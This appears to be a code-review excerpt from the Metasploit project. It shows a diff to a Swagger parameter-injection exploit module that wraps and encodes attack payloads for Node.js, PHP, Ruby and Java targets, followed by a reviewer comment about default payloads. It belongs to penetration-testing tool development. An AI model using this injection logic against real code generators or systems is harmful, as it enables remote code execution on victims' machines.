modules/exploits/multi/fileformat/swagger_param_inject.rb

```diff
@@ -118,12 +126,34 @@ def swagger
   end
 
   def exploit
-    # NodeJS only, for now.
-    wrapped_payload = datastore['PAYLOAD_PREFIX'] +
-                      payload.encoded + datastore['PAYLOAD_SUFFIX']
-    datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+    if datastore['PAYLOAD']
+      case payload.arch[0]
+      when 'nodejs'
+        wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+                          payload.encoded + datastore['PAYLOAD_SUFFIX']
+        datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+      when 'php'
+        wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+                          Base64.strict_encode64(payload.encoded) +
+                          datastore['PAYLOAD_SUFFIX']
+        datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+      when 'ruby'
+        wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+                          payload.encoded + datastore['PAYLOAD_SUFFIX']
+        datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+      when 'java'
+        p = payload.encoded.gsub(/<%@page import="/, 'import ')
+        p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
+        p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
+        wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+                          p + datastore['PAYLOAD_SUFFIX']
+        datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+      end
+    else
+      print_error("No payload defined!")
```

Comment:
@todb-r7  although you made a point earlier that modules should always have default payloads, it is quite useful to have a blank swagger doc with A,B,C,..etc in the fields to checkout where they are injected into code.  That being said, I have no stake in making people create non-exploit exploits.